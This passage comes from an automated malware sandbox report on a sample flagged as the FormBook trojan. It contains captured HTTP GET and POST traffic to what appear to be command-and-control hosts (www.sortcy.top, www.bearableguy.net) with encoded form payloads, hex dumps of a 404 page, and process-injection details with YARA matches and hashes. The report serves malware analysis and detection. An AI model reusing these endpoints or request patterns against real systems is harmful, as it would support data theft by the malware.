                                                          Nov 5, 2024 15:44:38.989149094 CET1236INData Raw: 2d 2e 37 38 39 2d 31 2e 36 35 32 2d 31 2e 35 35 31 2d 32 2e 30 39 4d 37 38 2e 39 35 35 20 38 2e 30 38 32 63 2d 2e 31 33 34 2d 2e 35 35 2d 2e 32 35 39 2d 31 2e 31 32 36 2d 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37
                                                          Data Ascii: -.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.06
                                                          Nov 5, 2024 15:44:38.989156961 CET1236INData Raw: 2e 31 38 31 2d 2e 30 34 33 2e 33 35 37 2d 2e 30 35 33 2e 35 33 39 2d 2e 30 31 33 2e 32 34 35 2e 30 31 36 2e 34 35 2e 30 36 2e 36 31 32 2e 30 39 31 2e 33 33 2e 33 32 2e 35 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38 36 2d 2e 33 37
                                                          Data Ascii: .181-.043.357-.053.539-.013.245.016.45.06.612.091.33.32.515.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.
                                                          Nov 5, 2024 15:44:38.993796110 CET1236INData Raw: 6c 2e 30 32 37 2d 2e 30 35 33 63 2e 30 36 2d 2e 31 31 34 2e 30 38 33 2d 2e 32 36 36 2d 2e 30 32 35 2d 2e 33 37 32 4d 31 30 36 2e 37 39 38 20 32 32 2e 32 32 63 2d 2e 31 30 37 2d 2e 32 39 32 2d 2e 37 35 37 2d 2e 33 30 34 2d 2e 37 39 34 2e 30 32 38
                                                          Data Ascii: l.027-.053c.06-.114.083-.266-.025-.372M106.798 22.22c-.107-.292-.757-.304-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716-.24-.83.025-.131.304-.034.606.41.754.101.033.24.03


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.450035184.94.215.26802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:40.796757936 CET445OUTGET /sm4f/?Ot=J0UP4Hshc&H0kxIVc=EaEMrXPp8wHqWJVBhtHqF3+v/VQY0/i9nv6TiqWBPFHSbs8QlWt2xVXVrkxIfcrF7TYepETuHZ89BYJlBcojqP6ggOEAyvBHZWGMGsHph5U7SQ47QEw+uXM= HTTP/1.1
                                                          Host: www.sortcy.top
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:44:41.510539055 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:41 GMT
                                                          Server: Apache
                                                          Content-Length: 13840
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                          Nov 5, 2024 15:44:41.510677099 CET1236INData Raw: 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a
                                                          Data Ascii: nsform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}
                                                          Nov 5, 2024 15:44:41.510689974 CET1236INData Raw: 31 39 36 2d 34 2e 31 2d 32 35 2e 37 2d 31 2e 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d
                                                          Data Ascii: 196-4.1-25.7-1.774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.71
                                                          Nov 5, 2024 15:44:41.510701895 CET1236INData Raw: 39 20 32 30 2e 38 20 36 35 2e 31 37 35 20 32 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e
                                                          Data Ascii: 9 20.8 65.175 21.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34
                                                          Nov 5, 2024 15:44:41.510714054 CET848INData Raw: 20 33 2e 32 38 39 20 31 2e 34 35 38 20 32 31 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e
                                                          Data Ascii: 3.289 1.458 21.239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161
                                                          Nov 5, 2024 15:44:41.510787964 CET1236INData Raw: 2d 2e 36 32 39 2e 36 31 36 2d 2e 39 34 32 2e 32 34 33 2d 2e 33 36 33 2e 36 33 2d 2e 36 37 35 2e 37 36 37 2d 31 2e 30 36 34 2e 31 37 33 2d 2e 34 38 36 2d 2e 37 35 33 2d 2e 39 33 2d 31 2e 34 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32
                                                          Data Ascii: -.629.616-.942.243-.363.63-.675.767-1.064.173-.486-.753-.93-1.43-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.40
                                                          Nov 5, 2024 15:44:41.510799885 CET1236INData Raw: 31 2e 37 31 33 2d 2e 37 31 32 2d 32 2e 37 32 37 2d 2e 34 37 39 2d 2e 33 37 2e 30 38 35 2d 2e 32 34 2e 33 31 35 2e 30 34 34 2e 33 39 36 2e 36 30 31 2e 31 37 33 20 31 2e 31 36 38 2e 34 30 38 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31
                                                          Data Ascii: 1.713-.712-2.727-.479-.37.085-.24.315.044.396.601.173 1.168.408 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791
                                                          Nov 5, 2024 15:44:41.510941982 CET1236INData Raw: 2d 2e 31 35 34 2e 32 34 33 2e 36 32 32 2e 33 35 37 2e 39 32 35 2e 31 37 33 2e 32 32 37 2d 2e 30 35 31 2e 34 34 34 2d 2e 31 30 34 2e 37 30 35 2d 2e 31 33 2e 35 32 31 2d 2e 30 35 34 20 31 2e 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35
                                                          Data Ascii: -.154.243.622.357.925.173.227-.051.444-.104.705-.13.521-.054 1.021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.3
                                                          Nov 5, 2024 15:44:41.510953903 CET1236INData Raw: 32 2e 33 38 2d 31 2e 31 32 36 2e 35 32 32 2d 31 2e 37 34 31 2e 31 33 39 2d 2e 36 30 35 2d 2e 32 30 34 2d 31 2e 33 39 33 2d 2e 34 37 2d 2e 39 33 33 4d 31 30 33 2e 39 37 37 20 38 2e 38 36 33 63 2d 2e 32 36 35 2d 31 2e 31 37 37 2d 31 2e 34 37 37 2d
                                                          Data Ascii: 2.38-1.126.522-1.741.139-.605-.204-1.393-.47-.933M103.977 8.863c-.265-1.177-1.477-2.153-2.51-1.784-.548.195-.653 1.156-.104 1.442.294.153.53.397.762.655.326.36.549.611.988.784.564.223.992-.535.864-1.097M100.988 4.781c.03-.437-.169-.702-.568-.7
                                                          Nov 5, 2024 15:44:41.510965109 CET848INData Raw: 30 37 39 2d 2e 34 39 39 2d 2e 31 35 33 2d 2e 39 37 36 2d 2e 32 36 34 2d 31 2e 34 34 35 2d 2e 32 30 35 2d 2e 38 36 2d 2e 38 35 33 2d 2e 31 37 34 2d 2e 36 38 39 2e 37 33 2e 30 38 39 2e 34 39 2e 31 34 38 2e 39 38 32 2e 32 35 20 31 2e 34 36 2e 31 39
                                                          Data Ascii: 079-.499-.153-.976-.264-1.445-.205-.86-.853-.174-.689.73.089.49.148.982.25 1.46.196.907.849.182.703-.745M78.957 24.496c.068-.31.05-.616-.02-.91-.077-.321-.14-.65-.183-1.002-.099-.82-.671-.76-.736.076-.056.71.019 1.361.23 1.918.132.348.265.461.
                                                          Nov 5, 2024 15:44:41.515769005 CET1236INData Raw: 38 2d 31 2e 37 33 35 20 35 2e 31 39 37 2d 34 2e 34 37 36 20 35 2e 34 37 2d 32 2e 37 34 38 2e 32 37 34 2d 35 2e 31 39 39 2d 31 2e 37 33 32 2d 35 2e 34 37 36 2d 34 2e 34 38 2d 2e 32 37 2d 32 2e 37 34 38 20 31 2e 37 33 35 2d 35 2e 31 39 37 20 34 2e
                                                          Data Ascii: 8-1.735 5.197-4.476 5.47-2.748.274-5.199-1.732-5.476-4.48-.27-2.748 1.735-5.197 4.483-5.47 2.748-.274 5.192 1.733 5.469 4.48M93.976 28.505c.27 2.748-1.735 5.197-4.483 5.47-2.748.273-5.192-1.733-5.469-4.48-.27-2.748 1.735-5.197 4.483-5.47 2.748


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.4500363.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:47.430522919 CET724OUTPOST /m3fv/ HTTP/1.1
                                                          Host: www.bearableguy.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bearableguy.net
                                                          Referer: http://www.bearableguy.net/m3fv/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6d 44 4c 37 77 78 53 77 4c 76 68 57 2b 73 57 30 52 33 68 4e 68 65 65 75 53 43 7a 76 6e 42 53 38 47 2b 48 76 74 71 56 4b 7a 67 75 6c 4a 66 47 6d 52 68 6d 36 50 6e 55 70 30 62 31 39 72 59 77 52 48 33 74 4b 39 72 6c 42 54 6a 54 49 78 52 43 73 77 73 44 58 61 77 32 4b 45 38 37 47 44 67 32 57 6e 66 6d 38 64 65 54 78 63 58 70 46 31 32 50 6c 30 75 2b 71 59 50 52 33 6e 71 7a 42 67 4e 61 62 44 61 6b 2f 31 43 55 2f 56 31 6d 63 7a 6f 4e 54 41 32 5a 35 30 58 4d 56 34 67 46 35 77 36 61 69 6e 74 66 79 51 32 43 4d 4b 35 4c 32 6a 61 62 33 77 50 68 55 73 73 58 34 67 74 32 50 41 6b 64 39 50 67 3d 3d
                                                          Data Ascii: H0kxIVc=mDL7wxSwLvhW+sW0R3hNheeuSCzvnBS8G+HvtqVKzgulJfGmRhm6PnUp0b19rYwRH3tK9rlBTjTIxRCswsDXaw2KE87GDg2Wnfm8deTxcXpF12Pl0u+qYPR3nqzBgNabDak/1CU/V1mczoNTA2Z50XMV4gF5w6aintfyQ2CMK5L2jab3wPhUssX4gt2PAkd9Pg==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.4500373.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:49.970905066 CET744OUTPOST /m3fv/ HTTP/1.1
                                                          Host: www.bearableguy.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bearableguy.net
                                                          Referer: http://www.bearableguy.net/m3fv/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6d 44 4c 37 77 78 53 77 4c 76 68 57 38 4a 65 30 54 57 68 4e 6e 2b 65 76 4c 43 7a 76 74 68 53 34 47 2f 37 76 74 6f 35 61 7a 53 36 6c 4b 36 69 6d 51 6c 79 36 4f 6e 55 70 36 37 30 33 6d 34 78 64 48 32 51 70 39 70 78 42 54 6e 44 49 78 55 2b 73 77 61 4c 57 62 67 32 49 4e 63 37 45 4d 41 32 57 6e 66 6d 38 64 65 48 66 63 58 68 46 31 47 66 6c 6d 63 57 72 44 76 52 34 74 4b 7a 42 71 74 61 48 44 61 6b 42 31 44 4a 51 56 7a 69 63 7a 71 56 54 41 6e 5a 36 36 58 4d 54 6c 77 45 32 2f 37 71 75 68 49 57 61 61 77 71 2b 47 4b 4b 58 6d 63 4b 74 68 2b 41 44 2b 73 7a 4c 39 71 2f 37 4e 6e 67 30 55 6a 6d 77 48 6e 75 37 55 59 6c 5a 53 59 4d 64 65 33 31 6b 61 59 41 3d
                                                          Data Ascii: H0kxIVc=mDL7wxSwLvhW8Je0TWhNn+evLCzvthS4G/7vto5azS6lK6imQly6OnUp6703m4xdH2Qp9pxBTnDIxU+swaLWbg2INc7EMA2Wnfm8deHfcXhF1GflmcWrDvR4tKzBqtaHDakB1DJQVziczqVTAnZ66XMTlwE2/7quhIWaawq+GKKXmcKth+AD+szL9q/7Nng0UjmwHnu7UYlZSYMde31kaYA=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.4500383.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:52.518520117 CET10826OUTPOST /m3fv/ HTTP/1.1
                                                          Host: www.bearableguy.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bearableguy.net
                                                          Referer: http://www.bearableguy.net/m3fv/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6d 44 4c 37 77 78 53 77 4c 76 68 57 38 4a 65 30 54 57 68 4e 6e 2b 65 76 4c 43 7a 76 74 68 53 34 47 2f 37 76 74 6f 35 61 7a 54 43 6c 4a 4d 75 6d 51 45 79 36 63 58 55 70 6b 72 30 32 6d 34 78 55 48 33 34 31 39 70 74 37 54 68 66 49 77 32 6d 73 79 6f 6a 57 53 67 32 49 53 4d 37 46 44 67 32 35 6e 66 32 34 64 65 58 66 63 58 68 46 31 45 58 6c 6c 4f 2b 72 45 66 52 33 6e 71 7a 46 67 4e 61 6a 44 61 73 33 31 44 39 36 56 44 43 63 7a 4b 46 54 4e 31 78 36 6c 48 4d 52 6b 77 46 70 2f 37 6e 77 68 49 69 34 61 30 6a 6a 47 4e 36 58 71 62 2f 73 2b 62 68 63 6f 75 76 34 6a 71 76 76 49 58 45 74 63 67 71 7a 41 45 4f 2f 4f 62 46 7a 61 50 74 6e 4d 56 64 45 4f 63 30 53 78 54 58 39 6c 37 71 53 4f 43 65 4f 51 65 53 43 30 76 44 37 72 6e 65 31 51 78 61 57 73 7a 35 71 69 45 75 53 62 62 51 54 2f 65 41 64 32 6e 48 2b 52 71 55 37 75 68 46 68 68 73 51 49 78 7a 73 55 6a 68 43 56 65 65 2f 4c 64 4c 4d 47 39 35 56 53 49 4c 72 5a 57 4b 39 53 75 44 37 6d 4d 37 45 4a 38 71 36 2b 78 36 79 56 51 63 58 57 4b 53 37 5a 6f 7a [TRUNCATED]
                                                          Data Ascii: H0kxIVc=mDL7wxSwLvhW8Je0TWhNn+evLCzvthS4G/7vto5azTClJMumQEy6cXUpkr02m4xUH3419pt7ThfIw2msyojWSg2ISM7FDg25nf24deXfcXhF1EXllO+rEfR3nqzFgNajDas31D96VDCczKFTN1x6lHMRkwFp/7nwhIi4a0jjGN6Xqb/s+bhcouv4jqvvIXEtcgqzAEO/ObFzaPtnMVdEOc0SxTX9l7qSOCeOQeSC0vD7rne1QxaWsz5qiEuSbbQT/eAd2nH+RqU7uhFhhsQIxzsUjhCVee/LdLMG95VSILrZWK9SuD7mM7EJ8q6+x6yVQcXWKS7ZozMkaeay1yXa267XmiKcH8r5zKVBC9aB3dfatpSzkEHlZPE5zViJ7Uve9TYwt3OK6e0VAsfGIe9TBDYTbSst3M1y5Ycz9Ptttu8aKzv8fK6QzXm21vyOKNINE66/KIVGyvy85IJPDkMMoJqjEcgQVElE7nL3F1dejMEz04vr8B33QFZlNTe8nwyx9WuuF0b69l/JmKPYOrAgleZ2277qYZc3SaESDhszuF6a+KK+YH+h3lQ7JxNTwBxh2pJV+LFziPh8XfQefTH9rETpj8GQiY4SAmfArJY1cPEarFreZETWmHqWwonvuKD121chM/3cTloxAYW92RYO7eKgWvQNMunAf3YuaCfSjoIbk0s8xB3AJ5X8F2KLfZJzLVTfM91RuYcRcbySkUjw4oipgDk10B1+moW2Q9RS4Wj7CWOBsgNBdtJZEYVDNfv2hDv23uAexxPcxGhUuU1FFvmV6L3iqPufAOUJ1ZtnZENkT0SjnDxScQIAeesXXFvCefF+YymoQDMCFRYcWhdsN3CKDIYq6na4H+iuBn1OnT0P5Pfp3YveLXxrhGxVXGRmStkuhsuleVFpYqwhUfowDt+IbOWAeFTFiTUtVK38W3Vpa5XO8BaX0up32x6p114QHJ1Ptk2Wk9KAxsgLzOddqVkbV/lPwgeSTnaohbIKUqaw [TRUNCATED]


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:09:41:47
                                                          Start date:05/11/2024
                                                          Path:C:\Users\user\Desktop\H1CYDJ8LQe.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\H1CYDJ8LQe.exe"
                                                          Imagebase:0x400000
                                                          File size:1'517'995 bytes
                                                          MD5 hash:8AFEAE6EC5433E3F0C6903FC107FA851
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:09:41:48
                                                          Start date:05/11/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\H1CYDJ8LQe.exe"
                                                          Imagebase:0x590000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:09:41:57
                                                          Start date:05/11/2024
                                                          Path:C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe"
                                                          Imagebase:0x4b0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:3
                                                          Start time:09:41:58
                                                          Start date:05/11/2024
                                                          Path:C:\Windows\SysWOW64\dvdplay.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\dvdplay.exe"
                                                          Imagebase:0xfa0000
                                                          File size:10'240 bytes
                                                          MD5 hash:D388610A1DE600E01277AECF3B1280A3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:7
                                                          Start time:09:42:14
                                                          Start date:05/11/2024
                                                          Path:C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe"
                                                          Imagebase:0x4b0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:8
                                                          Start time:09:42:26
                                                          Start date:05/11/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff6bf500000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:3.5%
                                                            Dynamic/Decrypted Code Coverage:0.4%
